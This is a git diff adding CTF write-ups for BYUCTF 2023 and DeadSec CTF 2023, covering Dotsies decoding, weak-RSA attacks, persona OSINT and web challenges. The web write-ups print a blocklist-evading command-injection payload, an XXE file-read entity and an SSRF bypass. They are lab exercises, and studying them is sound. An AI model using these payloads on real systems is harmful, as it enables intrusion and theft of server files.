feat: added 2 CTF writeup
|
@ -0,0 +1,18 @@
|
|||
# Compact
|
||||
> Apparently this is meant to replace the Latin alphabet??
|
||||
|
||||
> Flag format: byuctf{word or phrase} case insensitve.
|
||||
|
||||
## About the Challenge
|
||||
We need to decode the message in the image below
|
||||
|
||||
![chall](chall.png)
|
||||
|
||||
## How to Solve?
|
||||
To solve this, im using [Dotsies translator](https://www.dcode.fr/dotsies-writing) by dcode.fr
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{well its definitely more compact}
|
||||
```
|
After Width: | Height: | Size: 1.9 KiB |
After Width: | Height: | Size: 163 KiB |
|
@ -0,0 +1,30 @@
|
|||
# Legoclones 1
|
||||
> For some reason completely incomprehensible to mankind, you have become sworn enemies of one of the BYUCTF organizers, Legoclones. In your efforts to defeat him, you have decided to go back to the origins of Legoclones to learn more about him. This is what you know so far:
|
||||
|
||||
> He once claimed that he's been going by the moniker "Legoclones" for over a decade
|
||||
There was a website that he adopted and fostered for about 3 years, based on a specific, niche area of Star Wars
|
||||
Your goal now is to find this website that he claims as "his". When he retired from the website, he stated he was leaving it in the hands of Commander ????. What was the username of the person he turned the site over to?
|
||||
|
||||
> Notes from the organizer:
|
||||
|
||||
> The remaining 4 Legoclones-related OSINT challenges will open up after this one
|
||||
> Doxxing Legoclones in real-life will not help you in any of these OSINT challenges. Stick to Legoclones and not his real-life counterpart
|
||||
> Flag format - byuctf{Username}
|
||||
|
||||
## About the Challenge
|
||||
We have to find the username that took over the website when `Legoclones` retired
|
||||
|
||||
## How to Solve?
|
||||
At first im using [whatsmyname.app](https://whatsmyname.app/) to find any account related to `Legoclones`. And I found `Legoclones` have a reddit account. And if we check the account, I found there is 1 comment about his website
|
||||
|
||||
![reddit](images/reddit.png)
|
||||
|
||||
Go to the website and find his account and you will find the username that took over the fandom account
|
||||
|
||||
https://clonetrooper.fandom.com/wiki/User:Legoclones
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{Blyndblitz}
|
||||
```
|
After Width: | Height: | Size: 75 KiB |
After Width: | Height: | Size: 57 KiB |
|
@ -0,0 +1,21 @@
|
|||
# Legoclones 3
|
||||
> Wow, this wiki is so old, it wasn't even captured by the Wayback Machine until a few years after it had started to flourish. Can you figure out the exact date and time the wiki was created? There may be somewhat reputable sources with a date listed, but in an effort to force you to find an authoritative, reputable source, I'm also requiring you to find the time it was created too. Because I'm too lazy to worry about timezones, the flag is only the minute of when it was created.
|
||||
|
||||
> For example, if you found the wiki was created at 01:23, then the flag is byuctf{23}.
|
||||
|
||||
> Notes from the organizer:
|
||||
|
||||
> Doxxing Legoclones in real-life will not help you in any of these OSINT challenges. Stick to Legoclones and not his real-life counterpart
|
||||
> Flag format - byuctf{00}
|
||||
|
||||
## About the Challenge
|
||||
We have to find the time when the website was created
|
||||
|
||||
## How to Solve?
|
||||
You can find the time by checking history of the fandom (You can access the history [here](https://clonetrooper.fandom.com/wiki/Clone_Trooper_Wiki?action=history&dir=prev))
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{20}
|
||||
```
|
After Width: | Height: | Size: 51 KiB |
|
@ -0,0 +1,15 @@
|
|||
# BYUCTF 2023
|
||||
CTF writeup for The BYUCTF 2023. I took part in this CTF competition with the TCP1P team, and got 32th place out of 581 teams
|
||||
|
||||
Thanks to the team especially @dimasma0305 and @yuuna
|
||||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Crypto | [Compact](/BYUCTF%202023/Compact/)
|
||||
| Crypto | [RSA1](/BYUCTF%202023/RSA1/)
|
||||
| Crypto | [RSA2](/BYUCTF%202023/RSA2/)
|
||||
| Crypto | [RSA3](/BYUCTF%202023/RSA3/)
|
||||
| Crypto | [RSA4](/BYUCTF%202023/RSA4/)
|
||||
| Crypto | [RSA5](/BYUCTF%202023/RSA5/)
|
||||
| OSINT | [Legoclones 1](/BYUCTF%202023/Legoclones%201/)
|
||||
| OSINT | [Legoclones 2](/BYUCTF%202023/Legoclones%202/)
|
|
@ -0,0 +1,22 @@
|
|||
# RSA1
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain modulus, public exponent, and the ciphertext
|
||||
|
||||
```
|
||||
n = 287838647563564518717519107521814079281
|
||||
|
||||
e = 7
|
||||
|
||||
c = 258476617615202392748150555415953446503
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and then choose the first option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{too_smol}
|
||||
```
|
After Width: | Height: | Size: 44 KiB |
|
@ -0,0 +1,5 @@
|
|||
n = 287838647563564518717519107521814079281
|
||||
|
||||
e = 7
|
||||
|
||||
c = 258476617615202392748150555415953446503
|
|
@ -0,0 +1,22 @@
|
|||
# RSA2
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain modulus, public exponent, and the ciphertext
|
||||
|
||||
```
|
||||
n = 546014635841741214724882952304387823741798461149589549073179989118942746109940806878269775538274570065946589413677004071487344751464649121103982272835006900203922112014630898761428602513684456008956735791010937229939856259403186940249737579526542460562078728957198932156520780835942292131829398548678970431263462917223085165930683353518778015361505451889259321493813123084031407195410778661720394898118828299025325200597986154170392835072784810370185329392356423340408483449291280713796374297147668615988522804223480631576577707073715128342533703842150980913675658012799681575774731843549389349977365287936534707998476564357339504431638612839358093914282814270477657856345062084136585402704930924062452984009716927826681976269057923158930326380110735873715506666086031427627450725825495228912040943784627278987497908133546573083543604901933763330940965980882566819970423354937076331119777415405707162588442490342746115310986462330781467571631209829523895479737199963129517613642920935109776495829400236613168913129178658637967592913193540283532220304664924612246117951571439486418122093867454452618997458068515332016877486822805232899716524040444751997121936138984564834862354469295078855441829018404782747219665338778379471257704041
|
||||
|
||||
e = 65537
|
||||
|
||||
c = 497483520135207500611760341868934810216889295862727367409205471739457798733223813938415492642898622071289502771394670201759355356873731071744923938304067196827981196823596976532284031567818944043351160692892539254848854527943095670705184836531463778923699513154523281624336593518751911469590777921172775020125081803529411082078530404614569485860638460689961289946436553586222781503048987585305336865777424252321433817251942278548031598867440246798562662298880488044382840476214732326114298681849826143159014132251265975612736174765852107701466877003101250308950535660691651846052082123375934624356694170453897672257371991315676787548733520567289929667876604682273501711766130944645562650989837328685043543330211830184365436596077862055649246517141787872170320358968622818470064395975654949073402489903952399985907827496667385839890041608685588908200009780210043116940593521695695047783434230143405184690206691002634954008353327872663055826018481013718627348218684688250775372760462829705754318024652361552668830110066219305953343851243676904796434142570868419087560131333056695456062994781034014322792678534785191950145702468201676105282230660132801024614625267740668507168119879074770666830923799616054485447308126877109671082189614
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and then choose the first option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{rsa_is_only_secure_when_p_and_q_are_unknown}
|
||||
```
|
After Width: | Height: | Size: 142 KiB |
|
@ -0,0 +1,5 @@
|
|||
n = 546014635841741214724882952304387823741798461149589549073179989118942746109940806878269775538274570065946589413677004071487344751464649121103982272835006900203922112014630898761428602513684456008956735791010937229939856259403186940249737579526542460562078728957198932156520780835942292131829398548678970431263462917223085165930683353518778015361505451889259321493813123084031407195410778661720394898118828299025325200597986154170392835072784810370185329392356423340408483449291280713796374297147668615988522804223480631576577707073715128342533703842150980913675658012799681575774731843549389349977365287936534707998476564357339504431638612839358093914282814270477657856345062084136585402704930924062452984009716927826681976269057923158930326380110735873715506666086031427627450725825495228912040943784627278987497908133546573083543604901933763330940965980882566819970423354937076331119777415405707162588442490342746115310986462330781467571631209829523895479737199963129517613642920935109776495829400236613168913129178658637967592913193540283532220304664924612246117951571439486418122093867454452618997458068515332016877486822805232899716524040444751997121936138984564834862354469295078855441829018404782747219665338778379471257704041
|
||||
|
||||
e = 65537
|
||||
|
||||
c = 497483520135207500611760341868934810216889295862727367409205471739457798733223813938415492642898622071289502771394670201759355356873731071744923938304067196827981196823596976532284031567818944043351160692892539254848854527943095670705184836531463778923699513154523281624336593518751911469590777921172775020125081803529411082078530404614569485860638460689961289946436553586222781503048987585305336865777424252321433817251942278548031598867440246798562662298880488044382840476214732326114298681849826143159014132251265975612736174765852107701466877003101250308950535660691651846052082123375934624356694170453897672257371991315676787548733520567289929667876604682273501711766130944645562650989837328685043543330211830184365436596077862055649246517141787872170320358968622818470064395975654949073402489903952399985907827496667385839890041608685588908200009780210043116940593521695695047783434230143405184690206691002634954008353327872663055826018481013718627348218684688250775372760462829705754318024652361552668830110066219305953343851243676904796434142570868419087560131333056695456062994781034014322792678534785191950145702468201676105282230660132801024614625267740668507168119879074770666830923799616054485447308126877109671082189614
|
|
@ -0,0 +1,29 @@
|
|||
# RSA3
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain 2 modulus, public exponent, and 2 ciphertexts
|
||||
|
||||
```
|
||||
n1 = 26936730986023789726214222876998431579035871765812234385674097050592112272540329063679602773116293498245937781951160051718036177035087801218359133356523071700951108999020905116034905584806261203518345118128714311038590925635180342040347317022008233631809623824589107373210514331169745651687793393307158179191306187356408951648269495142386375021669218752561961647301029204701333026044435685936341126368602940601101599988477874713569476970068734357580527463645209944448988010693985476127837819331701523891965427561798033127731232916390511986369304971158889254173850566560028528340860519614489276904182246324437302697433
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 25934221721388531303090294836956821212346696995428676440185777623629033147440636130540319272854260855117016879903925227836710795492438220977864741830686432435183222727791461378988782191893620213711460265022633971293289987925875691438890670054518553696690583070284033592035281829227897938832962322172505881421894428362134145126751766514249801481330619906708370005958557827981820321861133293595400304305721764486699677941331024345924352161482159664366018182446127343098427579677894070842066840562853624060861183697917208697602208453017595582242281467105778066369782229287834403074433848470534633158573935584429007575715
|
||||
|
||||
|
||||
n2 = 20923351960149847207730448386993771286287991808293298691185156471519720793292179321382926775933281826329369963004005667653815105072159583791658532166606431385861980687037872135521884790087813454844716254644626942821490878728677736261700329782075809716063515721266692286574071240561529911159730824490258866613280873755548760004314650585913096197607936750263556276920577987540676841745347308103070523989154846358123142014592046611945781700690640990848003152423310523158983857208127158850925297742214928064334410930947749935069628731105093722212442331657106356911123912454871778728334875010902513275561639806401894881233
|
||||
|
||||
e2 = 65537
|
||||
|
||||
c2 = 5993773597007465934515223705550947500391213737662065644971977783446564890828050443747162704068048188331597029929182281837445674583301936037963788912954366180921337518251139032904603786774772009913305609053718347365864177247549192649908207240197602397010006677485658506955283638199651692990436006544549785434255965098715363287267470252318128158357490592521797199393154974403123099999366644663048724011101287811844340320520544010179529188112211115440469084617438296961494801221969674213288489675624156545941630517075958425681203711654677553772595530799489102830165490202523397154229276688719481530893488434863906070343
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and because then choose the 14th option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{coprime_means_factoring_N_becomes_much_easier}
|
||||
```
|
After Width: | Height: | Size: 158 KiB |
|
@ -0,0 +1,12 @@
|
|||
n1 = 26936730986023789726214222876998431579035871765812234385674097050592112272540329063679602773116293498245937781951160051718036177035087801218359133356523071700951108999020905116034905584806261203518345118128714311038590925635180342040347317022008233631809623824589107373210514331169745651687793393307158179191306187356408951648269495142386375021669218752561961647301029204701333026044435685936341126368602940601101599988477874713569476970068734357580527463645209944448988010693985476127837819331701523891965427561798033127731232916390511986369304971158889254173850566560028528340860519614489276904182246324437302697433
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 25934221721388531303090294836956821212346696995428676440185777623629033147440636130540319272854260855117016879903925227836710795492438220977864741830686432435183222727791461378988782191893620213711460265022633971293289987925875691438890670054518553696690583070284033592035281829227897938832962322172505881421894428362134145126751766514249801481330619906708370005958557827981820321861133293595400304305721764486699677941331024345924352161482159664366018182446127343098427579677894070842066840562853624060861183697917208697602208453017595582242281467105778066369782229287834403074433848470534633158573935584429007575715
|
||||
|
||||
|
||||
n2 = 20923351960149847207730448386993771286287991808293298691185156471519720793292179321382926775933281826329369963004005667653815105072159583791658532166606431385861980687037872135521884790087813454844716254644626942821490878728677736261700329782075809716063515721266692286574071240561529911159730824490258866613280873755548760004314650585913096197607936750263556276920577987540676841745347308103070523989154846358123142014592046611945781700690640990848003152423310523158983857208127158850925297742214928064334410930947749935069628731105093722212442331657106356911123912454871778728334875010902513275561639806401894881233
|
||||
|
||||
e2 = 65537
|
||||
|
||||
c2 = 5993773597007465934515223705550947500391213737662065644971977783446564890828050443747162704068048188331597029929182281837445674583301936037963788912954366180921337518251139032904603786774772009913305609053718347365864177247549192649908207240197602397010006677485658506955283638199651692990436006544549785434255965098715363287267470252318128158357490592521797199393154974403123099999366644663048724011101287811844340320520544010179529188112211115440469084617438296961494801221969674213288489675624156545941630517075958425681203711654677553772595530799489102830165490202523397154229276688719481530893488434863906070343
|
|
@ -0,0 +1,38 @@
|
|||
# RSA4
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain 3 modulus, public exponent, and 3 ciphertexts
|
||||
|
||||
```
|
||||
n1 = 25204912957894049536633029588071532883154221495361435745558539407530325536509218257991893451902442183954212400671502526830623527340613723328379300388737939211263541814108106183164630301938900862986688763583982133846507136234797325243547177627054271161715200611591594812723672399437505379398941496184886411879923583394041753902383846644013849190900416111230521180435101859101110596828380586449182686175177638441549656137307050392520754146511496313215137339773851458160180450925216541537448515297981124184019831730808991821344392915274230294654187421183676471212265322367890189804699510021526923237231850244056681024361
|
||||
|
||||
e1 = 3
|
||||
|
||||
c1 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n2 = 17730912385401458370516374144454354828481353051514329263921774569034415114147424203611660978860008058118764431105602401970281692066419254457694301039461623568501484102567802483628476717695013320444442267232019104240173401975387173805390636521671252624249730700497552226732834062715286458634274525026438931671208367178653031967364951679420066768732647183187381700016195545187024094717207787859217993871236368911145957298126589666514319408022801341248744002320245345234912423717815146532293315342644702101415345900126397475592837306256140915525455824350305349773210334856093169535686115299159772550674315375987529523179
|
||||
|
||||
e2 = 3
|
||||
|
||||
c2 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n3 = 23693871552180460990138635073805949225912252125308334418081834697641804631104724668330415198785050388969117484647897131795893896100932121531733121069301557203541651575306855376180158639595396645851251320756224273151350168394783274111111375428683335001923152182758469432988805562827169898721409159172411067426322303967736140645806651181720610635139163613355013365367013643617931710120446074129630384181873406149243284193113399417540744056880787819360491511062694356302764642727497777585348003477373456680752873785829149551421840290660162776229985812994060664107888011786183808824620497078292008444842754064007647832261
|
||||
|
||||
e3 = 3
|
||||
|
||||
c3 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and because then choose the 6th option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{hastad_broadcast_attack_is_why_e_needs_to_be_very_large}
|
||||
```
|
After Width: | Height: | Size: 170 KiB |
|
@ -0,0 +1,21 @@
|
|||
n1 = 25204912957894049536633029588071532883154221495361435745558539407530325536509218257991893451902442183954212400671502526830623527340613723328379300388737939211263541814108106183164630301938900862986688763583982133846507136234797325243547177627054271161715200611591594812723672399437505379398941496184886411879923583394041753902383846644013849190900416111230521180435101859101110596828380586449182686175177638441549656137307050392520754146511496313215137339773851458160180450925216541537448515297981124184019831730808991821344392915274230294654187421183676471212265322367890189804699510021526923237231850244056681024361
|
||||
|
||||
e1 = 3
|
||||
|
||||
c1 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n2 = 17730912385401458370516374144454354828481353051514329263921774569034415114147424203611660978860008058118764431105602401970281692066419254457694301039461623568501484102567802483628476717695013320444442267232019104240173401975387173805390636521671252624249730700497552226732834062715286458634274525026438931671208367178653031967364951679420066768732647183187381700016195545187024094717207787859217993871236368911145957298126589666514319408022801341248744002320245345234912423717815146532293315342644702101415345900126397475592837306256140915525455824350305349773210334856093169535686115299159772550674315375987529523179
|
||||
|
||||
e2 = 3
|
||||
|
||||
c2 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
||||
|
||||
================================================
|
||||
|
||||
n3 = 23693871552180460990138635073805949225912252125308334418081834697641804631104724668330415198785050388969117484647897131795893896100932121531733121069301557203541651575306855376180158639595396645851251320756224273151350168394783274111111375428683335001923152182758469432988805562827169898721409159172411067426322303967736140645806651181720610635139163613355013365367013643617931710120446074129630384181873406149243284193113399417540744056880787819360491511062694356302764642727497777585348003477373456680752873785829149551421840290660162776229985812994060664107888011786183808824620497078292008444842754064007647832261
|
||||
|
||||
e3 = 3
|
||||
|
||||
c3 = 8177192204481601898705460379101384591996531766013815643642297541939314169289538943467463950155787562006058743758523755363825964609610993939021120980839831173842134605117089923025444468026164578567348718360392736482132312367435114106411271743218631041094275894508404221506482038656928803775293360599721583316194630449469869000491476753827928793659938654925187969087524783314008405767753004191090522037968098548258698350055999105058915648497702724525585509
|
|
@ -0,0 +1,26 @@
|
|||
# RSA5
|
||||
`-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a file that contain 1 modulus, 2 public exponent, and 2 ciphertexts
|
||||
|
||||
```
|
||||
n = 158307578375429142391814474806884486236362186916188452580137711655290101749246194796158132723192108831610021920979976831387798531310286521988621973910776725756124498277292094830880179737057636826926718870947402385998304759357604096043571760391265436342427330673679572532727716853811470803394787706010603830747
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 147465654815005020063943150787541676244006907179548061733683379407115931956604160894199596187128857070739585522099795520030109295201146791378167977530770154086872347421667566213107792455663772279848013855378166127142983660396920011133029349489200452580907847840266595584254579298524777000061248118561875608240
|
||||
|
||||
e2 = 65521
|
||||
|
||||
c2 = 142713643080475406732653557020038566547302005567266455940547551173573770529850069157484999432568532977025654715928532390305041525635025949965799289602536953914794718670859158768092964083443092374251987427058692219234329521939404919423432910655508395090232621076454399975588453154238832799760275047924852124717
|
||||
```
|
||||
|
||||
## How to Solve?
|
||||
In this case im using [X-RSA](https://github.com/X-Vector/X-RSA) to recover the plaintext, and because then choose the 7th option
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
byuctf{NEVER_USE_SAME_MODULUS_WITH_DIFFERENT_e_VALUES}
|
||||
```
|
After Width: | Height: | Size: 86 KiB |
|
@ -0,0 +1,9 @@
|
|||
n = 158307578375429142391814474806884486236362186916188452580137711655290101749246194796158132723192108831610021920979976831387798531310286521988621973910776725756124498277292094830880179737057636826926718870947402385998304759357604096043571760391265436342427330673679572532727716853811470803394787706010603830747
|
||||
|
||||
e1 = 65537
|
||||
|
||||
c1 = 147465654815005020063943150787541676244006907179548061733683379407115931956604160894199596187128857070739585522099795520030109295201146791378167977530770154086872347421667566213107792455663772279848013855378166127142983660396920011133029349489200452580907847840266595584254579298524777000061248118561875608240
|
||||
|
||||
e2 = 65521
|
||||
|
||||
c2 = 142713643080475406732653557020038566547302005567266455940547551173573770529850069157484999432568532977025654715928532390305041525635025949965799289602536953914794718670859158768092964083443092374251987427058692219234329521939404919423432910655508395090232621076454399975588453154238832799760275047924852124717
|
After Width: | Height: | Size: 1.9 KiB |
|
@ -0,0 +1,26 @@
|
|||
# Bing
|
||||
> `-`
|
||||
|
||||
## About the Challenge
|
||||
We have been given a website that contains a form and we can input a host there
|
||||
|
||||
![preview_1](images/preview_1.png)
|
||||
|
||||
And then I tried to input 127.0.0.1 and here was the output
|
||||
|
||||
![preview_2](images/preview_2.png)
|
||||
|
||||
## How to Solve?
|
||||
We need to exploit the website using `Command Injection` vulnerability in order to read the flag. Here is the payload that I used to read the flag
|
||||
|
||||
```
|
||||
127.0.0.1;c\a\t${IFS}/f\lag.txt${IFS}|base64
|
||||
```
|
||||
|
||||
Because some of the commands are blacklisted by the website (Like `cat` or `ls`), we can trick it with `/` character. And because whitespace is also blacklisted by the website we can use `${IFS}`
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
dead{okokok!!!_th1s_flAg_f0R_Y0U}
|
||||
```
|
After Width: | Height: | Size: 276 KiB |
After Width: | Height: | Size: 32 KiB |
After Width: | Height: | Size: 25 KiB |
|
@ -0,0 +1,29 @@
|
|||
# FRSS
|
||||
> `-`
|
||||
|
||||
## About the Challenge
|
||||
We got a websites that can make requests to other websites and display the response
|
||||
|
||||
![preview](images/preview.png)
|
||||
|
||||
We need to access `/hehe.txt` by using that feature. However there is a limit of characters that we can input into that form
|
||||
|
||||
![preview_2](images/preview_2.png)
|
||||
|
||||
## How to Solve?
|
||||
In order to read the flag, we need to access the website internally and access the `/hehe.txt` endpoint
|
||||
|
||||
At first, I inputted `127.0.0.1/hehe.txt` but the response is `Oh no no, url is too long I can't handle it`. And then I and found this [payload](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
|
||||
|
||||
![PayloadAllTheThings](images/PayloadAllTheThings.png)
|
||||
|
||||
So, my final payload was:
|
||||
```
|
||||
0.0.0.0/hehe.txt
|
||||
```
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
dead{Ashiiiibaaa_you_hAv3_Pybass_chA11}
|
||||
```
|
After Width: | Height: | Size: 30 KiB |
After Width: | Height: | Size: 33 KiB |
After Width: | Height: | Size: 36 KiB |
After Width: | Height: | Size: 72 KiB |
|
@ -0,0 +1,10 @@
|
|||
# DeadSec CTF 2023
|
||||
CTF writeup for The DeadSec CTF 2023. I took part in this CTF competition with the TCP1P team, and got 16th place out of 436 teams
|
||||
|
||||
Thanks to the team especially @dimasma0305
|
||||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Web | [FRSS](/DeadSec%20CTF%202023/FRSS/)
|
||||
| Web | [Bing](/DeadSec%20CTF%202023/Bing/)
|
||||
| Web | [XEE1](/DeadSec%20CTF%202023/XEE1/)
|
|
@ -0,0 +1,38 @@
|
|||
# XEE1
|
||||
> flag in flag.txt
|
||||
|
||||
## About the Challenge
|
||||
We have been given a website that contains a login page
|
||||
|
||||
![preview](images/preview.png)
|
||||
|
||||
And if we check the HTTP request and response when entering the username and password
|
||||
|
||||
![http](images/http.png)
|
||||
|
||||
|
||||
## How to Solve?
|
||||
At first, Im using a `file` protocol to read `/flag.txt` file
|
||||
|
||||
![first_request](images/first_request.png)
|
||||
|
||||
But the output was `You can't read the flag`. Im very confused because my payload was working perfectly if I want to read another file (ex: /etc/passwd)
|
||||
|
||||
![testing](images/testing.png)
|
||||
|
||||
So I decided to use PHP wrapper to encoded the output with `base64` encoding. Here is the final payload
|
||||
|
||||
```xml
|
||||
<!--?xml version="1.0" ?-->
|
||||
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt"> ]>
|
||||
<user>
|
||||
<username>&ent;</username>
|
||||
<password>test</password>
|
||||
</user>
|
||||
```
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
dead{n1ce_br0_XE3_3z_h3h3}
|
||||
```
|
After Width: | Height: | Size: 145 KiB |
After Width: | Height: | Size: 234 KiB |
After Width: | Height: | Size: 132 KiB |
After Width: | Height: | Size: 27 KiB |
After Width: | Height: | Size: 246 KiB |
|
@ -5,15 +5,15 @@ Thanks to the team especially @spitfire
|
|||
|
||||
| Category | Challenge |
|
||||
| --- | --- |
|
||||
| Jubilife | [The Historian Channel - 1](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [The Historian Channel - 2](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [The Historian Channel - 3](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Windows Pane - 1](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Windows Pane - 2](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Windows Pane - 3](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 1](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 2](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 1](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 2](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 3a](/ICSJWG%20CTF%202023/)
|
||||
| Snowpoint | [The Phish Tank - 3b](/ICSJWG%20CTF%202023/)
|
||||
| Jubilife | [The Historian Channel - 1](/ICSJWG%20CTF%202023/The%20Historian%20Channel%20-%201/)
|
||||
| Jubilife | [The Historian Channel - 2](/ICSJWG%20CTF%202023/The%20Historian%20Channel%20-%202/)
|
||||
| Jubilife | [The Historian Channel - 3](/ICSJWG%20CTF%202023/The%20Historian%20Channel%20-%203/)
|
||||
| Jubilife | [Windows Pane - 1](/ICSJWG%20CTF%202023/Windows%20Pane%20-%201/)
|
||||
| Jubilife | [Windows Pane - 2](/ICSJWG%20CTF%202023/Windows%20Pane%20-%202/)
|
||||
| Jubilife | [Windows Pane - 3](/ICSJWG%20CTF%202023/Windows%20Pane%20-%203/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 1](/ICSJWG%20CTF%202023/Chrome-Plated%20Nonsense%20-%201/)
|
||||
| Jubilife | [Chrome-Plated Nonsense - 2](/ICSJWG%20CTF%202023/Chrome-Plated%20Nonsense%20-%202/)
|
||||
| Snowpoint | [The Phish Tank - 1](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%201/)
|
||||
| Snowpoint | [The Phish Tank - 2](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%202/)
|
||||
| Snowpoint | [The Phish Tank - 3a](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%203a/)
|
||||
| Snowpoint | [The Phish Tank - 3b](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%203b/)
|
|
@ -44,3 +44,6 @@ List of CTF events that i have joined before
|
|||
| Cyberconférence CTF (24h@CTF '23) | 14 April, 23:00 WIB — 16 April 2023, 21:00 WIB | [Link](/24h%40CTF%202023/) |
|
||||
| Texas Security Awareness Week 2023 | 15 April, 22:00 WIB — 17 April 2023, 05:00 WIB | [Link](/TexSAW%202023/) |
|
||||
| WaniCTF 2023 | 04 May, 13:00 WIB — 06 May 2023, 13:00 WIB | [Link](/WaniCTF%202023/) |
|
||||
| ICSJWG Spring 2023 | 07 May, 01:00 WIB — 12 May 2023, 01:00 WIB | [Link](/ICSJWG%20CTF%202023/) |
|
||||
| DeadSec CTF 2023 | 19 May, 20:00 WIB — 21 May 2023, 20:00 WIB | [Link](/DeadSec%20CTF%202023/) |
|
||||
| BYUCTF 2023 | 20 May, 00:00 WIB — 21 May 2023, 12:00 WIB | [Link](/BYUCTF%202023/) |
|